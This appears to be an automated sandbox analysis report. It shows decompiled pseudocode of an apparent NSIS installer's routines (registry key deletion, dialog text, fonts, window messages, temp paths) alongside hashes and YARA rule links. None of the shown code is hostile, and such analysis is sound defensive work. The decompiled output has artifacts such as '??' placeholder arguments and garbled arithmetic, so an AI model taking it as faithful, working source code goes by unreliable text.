              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
              • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404D3F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00404D3F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406579(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406579(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406579(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















              0x00404d48
              0x00404d4d
              0x00404d55
              0x00404d56
              0x00404d63
              0x00404d6b
              0x00404d6c
              0x00404d6e
              0x00404d70
              0x00404d72
              0x00404d75
              0x00404d75
              0x00404d7c
              0x00404d82
              0x00404d82
              0x00404d89
              0x00404d90
              0x00404d93
              0x00404d96
              0x00404d96
              0x00404d9a
              0x00404daa
              0x00404dac
              0x00404daf
              0x00404d58
              0x00404d58
              0x00404d5f
              0x00404d5f
              0x00404db7
              0x00404dc2
              0x00404dd8
              0x00404de9
              0x00404e05

              APIs
              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
              • wsprintfW.USER32 ref: 00404DE9
              • SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s$H7B
              • API String ID: 3540041739-107966168
              • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
              • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402E41, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063A9(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406931(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












              0x00402e4c
              0x00402e55
              0x00402e5e
              0x00402e6a
              0x00402e73
              0x00402e7d
              0x00402ea2
              0x00402ea8
              0x00402ead
              0x00402eae
              0x00402ede
              0x00402eb7
              0x00402eb9
              0x00402f09
              0x00402f0c
              0x00000000
              0x00402f12
              0x00402ec8
              0x00402ecd
              0x00402ecf
              0x00000000
              0x00000000
              0x00402ed7
              0x00402edc
              0x00402edd
              0x00402edd
              0x00402eea
              0x00402ef2
              0x00402ef9
              0x00000000
              0x00402f22
              0x00000000
              0x00402f01
              0x00402e8d
              0x00402ea0
              0x00000000
              0x00000000
              0x00000000
              0x00402ea0
              0x00402f28

              APIs
              • RegEnumValueW.ADVAPI32 ref: 00402E95
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseEnum$DeleteValue
              • String ID:
              • API String ID: 1354259210-0
              • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
              • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D81, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D1C(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402D3E(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406483();
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











              0x00401d81
              0x00401d85
              0x00401d9a
              0x00401d87
              0x00401d89
              0x00401d8f
              0x00401d8f
              0x00401da0
              0x00401da3
              0x00401dad
              0x00401db0
              0x00401db8
              0x00401dc9
              0x00401dcc
              0x00401dd7
              0x00401dce
              0x00401dd0
              0x00401dd0
              0x00401ddb
              0x00401de5
              0x00401e0c
              0x00401e1b
              0x00401e29
              0x00401e31
              0x00401e39
              0x00401e39
              0x00401e42
              0x00401e48
              0x00402b08
              0x00402b08
              0x00402bc5
              0x00402bd1

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
              • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401E4E, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D1C(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D1C(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E00406579(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E00406483();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











              0x00401e4e
              0x00401e59
              0x00401e5b
              0x00401e68
              0x00401e7f
              0x00401e84
              0x00401e91
              0x00401e96
              0x00401e9a
              0x00401ea5
              0x00401eac
              0x00401ebe
              0x00401ec4
              0x00401ec9
              0x00401ed3
              0x00402630
              0x0040156d
              0x00402b08
              0x00402bc5
              0x00402bd1

              APIs
              • GetDC.USER32(?), ref: 00401E51
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
              • ReleaseDC.USER32 ref: 00401E84
              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CapsCreateDeviceFontIndirectRelease
              • String ID:
              • API String ID: 3808545654-0
              • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
              • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401C43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D1C(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D1C(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402D3E(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402D3E();
					_t32 = E00402D3E();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D1C();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D1C(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406483();
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















              0x00401c43
              0x00401c45
              0x00401c4c
              0x00401c4f
              0x00401c52
              0x00401c5c
              0x00401c60
              0x00401c63
              0x00401c6c
              0x00401c6c
              0x00401c6f
              0x00401c73
              0x00401c7c
              0x00401c7c
              0x00401c7f
              0x00401c83
              0x00401c85
              0x00401cda
              0x00401cdc
              0x00401ce7
              0x00401cf1
              0x00401cf4
              0x00401cf4
              0x00401cfd
              0x00000000
              0x00401c87
              0x00401c8e
              0x00401c90
              0x00401c93
              0x00401c99
              0x00401ca0
              0x00401ca3
              0x00401ccb
              0x00401d03
              0x00401d03
              0x00401ca5
              0x00401cb3
              0x00401cbb
              0x00401cbe
              0x00401cbe
              0x00401ca3
              0x00401d06
              0x00401d09
              0x00401d0f
              0x00402b08
              0x00402b08
              0x00402bc5
              0x00402bd1

              APIs
              • SendMessageTimeoutW.USER32 ref: 00401CB3
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
              • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405E11, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00405E11(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




              0x00405e12
              0x00405e1f
              0x00405e20
              0x00405e2b
              0x00405e33
              0x00405e33
              0x00405e3b

              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-3081826266
              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403B19, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403B19() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2bc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2b8
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403B76();
				return E00405C4E(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nshD279.tmp", 7);
			}






              0x00403b19
              0x00403b28
              0x00403b2b
              0x00403b2d
              0x00403b2d
              0x00403b34
              0x00403b3c
              0x00403b3f
              0x00403b41
              0x00403b41
              0x00403b41
              0x00403b48
              0x00403b5a

              APIs
              • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
              • CloseHandle.KERNEL32(000002B8,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
              • C:\Users\user\AppData\Local\Temp\nshD279.tmp, xrefs: 00403B4F
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nshD279.tmp
              • API String ID: 2962429428-2705349947
              • Opcode ID: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
              • Opcode Fuzzy Hash: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E00405F19(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653C(0x425f50, _a4);
				_t21 = E00405EBC(0x425f50);
				if(_t21 != 0) {
					E004067EB(_t21);
					if(( *0x42a27c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040689A();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E5D(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E11();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








              0x00405f25
              0x00405f30
              0x00405f34
              0x00405f3b
              0x00405f47
              0x00405f57
              0x00405f59
              0x00405f71
              0x00405f72
              0x00405f79
              0x00405f7a
              0x00000000
              0x00000000
              0x00405f5d
              0x00405f64
              0x00405f6c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405f64
              0x00405f7c
              0x00000000
              0x00405f90
              0x00405f49
              0x00405f4f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405f4f
              0x00405f36
              0x00000000

              APIs
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405F72
              • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 00405F82
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
